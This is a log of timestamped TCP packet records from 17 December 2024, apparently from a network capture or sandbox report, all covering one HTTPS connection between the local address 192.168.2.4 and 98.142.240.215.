                                                                                                                                                                              Dec 17, 2024 18:12:43.391969919 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.394175053 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.394247055 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.394253969 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.394305944 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.396569014 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.396651030 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.396657944 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.396693945 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.398809910 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.398876905 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.398883104 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.398924112 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.401125908 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.401207924 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.401221037 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.401257038 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.403439045 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.403506994 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.403513908 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.403549910 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.405742884 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.405816078 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.405822039 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.405858040 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.408850908 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.408934116 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.408941031 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.408982038 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.410404921 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.410468102 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.410474062 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.410512924 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.412734032 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.412800074 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.412806034 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.412848949 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.415853024 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.415910959 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.415919065 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.415960073 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.417397976 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.417465925 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.417471886 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.417512894 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.419739008 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.419857979 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.419864893 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.419905901 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.422866106 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.422945023 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.422955036 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.422991037 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.579955101 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.580090046 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.580121994 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.580200911 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.582184076 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.582278013 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.582292080 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.582343102 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.584553003 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.584631920 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.584651947 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.584700108 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.587379932 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.587675095 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.587739944 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.587820053 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.590015888 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.590107918 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.590138912 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.590192080 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.592504025 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.592596054 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.592612982 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.592665911 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.594330072 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.594415903 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.594432116 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.594481945 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.596149921 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.596235991 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.596251011 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.596307993 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.598594904 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.598695040 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.598707914 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.598753929 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.600775957 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.600868940 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.600882053 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.600941896 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.603075981 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.603168964 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.603178978 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.603214979 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.605472088 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.605546951 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.605554104 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.605695009 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.607774973 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.607851982 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.607861996 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.607901096 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.610106945 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.610187054 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.610194921 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.610229969 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.612404108 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.612482071 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.612488985 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.612519026 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.614748001 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.614811897 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.614819050 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.614856005 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.772345066 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.772588968 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.772619963 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.772671938 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.774518013 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.774600983 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.774607897 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.774648905 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.776846886 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.776923895 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.776928902 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.776973009 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.779131889 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.779211044 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.779216051 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.779258966 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.781492949 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.781569958 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.781582117 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.781632900 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.783796072 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.783874989 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.783885956 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.783941031 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.786096096 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.786179066 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.786184072 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.786226988 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.788450003 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.788525105 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.788530111 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.788568974 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.790824890 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.790899992 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.790904045 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.790946007 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.793097019 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.793171883 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.793176889 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.793216944 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.795423031 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.795496941 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.795501947 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.795542955 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.797760963 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.797832966 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.797837973 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.797878981 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.800193071 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.800275087 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.800278902 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.800322056 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.802588940 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.802664995 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.802670002 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.802707911 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.805600882 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.805686951 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.805692911 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.805730104 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.807929039 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.808027983 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.808037043 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.808079004 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.964638948 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.964745998 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.964771986 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.964814901 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.966751099 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.966823101 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.966830969 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.966870070 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.969026089 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.969094992 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.969116926 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.969156981 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.971363068 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.971434116 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.971442938 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.971482992 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.973630905 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.973715067 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.973723888 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.973762989 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.975950003 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.976020098 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.976030111 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.976072073 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.978363991 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.978435040 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.978440046 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.978477955 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.980623007 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.980690956 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.980695009 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.980735064 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.982979059 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.983051062 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.983056068 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.983093977 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.985253096 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.985330105 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.985333920 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.985374928 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.988379955 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.988444090 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.988449097 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.988488913 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.989881039 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.989952087 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.989957094 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.990000010 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.992270947 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.992357016 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.992362022 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.992402077 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.995376110 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.995446920 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.995451927 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.995492935 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.996916056 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.996984005 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.996989012 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.997030020 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.999207020 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.999274015 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:43.999278069 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:43.999320030 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:44.280023098 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:44.280038118 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:44.280162096 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:44.280186892 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:44.280245066 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:44.404159069 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:44.404267073 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:44.404293060 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:44.404336929 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:44.406445026 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:44.406534910 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:44.406539917 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:44.406580925 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:44.408829927 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:44.408900976 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:44.408905983 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:44.408943892 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:44.411176920 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:44.411251068 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:44.411256075 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:44.411298037 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:44.413486004 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:44.413570881 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:44.413577080 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:44.413620949 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:44.415818930 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:44.415899992 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:44.415905952 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:44.415947914 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:44.418121099 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:44.418286085 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:44.418291092 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:44.418339968 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:44.420644999 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:44.420885086 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:44.420891047 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:44.420943975 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:44.422854900 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:44.422933102 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:44.422938108 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:44.422981977 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:44.425165892 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:44.425246954 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:44.425251961 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:44.425292969 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:44.427547932 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:44.427628040 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:44.427634001 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:44.427675009 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:44.429863930 CET4434973198.142.240.215192.168.2.4
                                                                                                                                                                              Dec 17, 2024 18:12:44.429966927 CET49731443192.168.2.498.142.240.215
                                                                                                                                                                              Dec 17, 2024 18:12:44.429971933 CET4434973198.142.240.215192.168.2.4
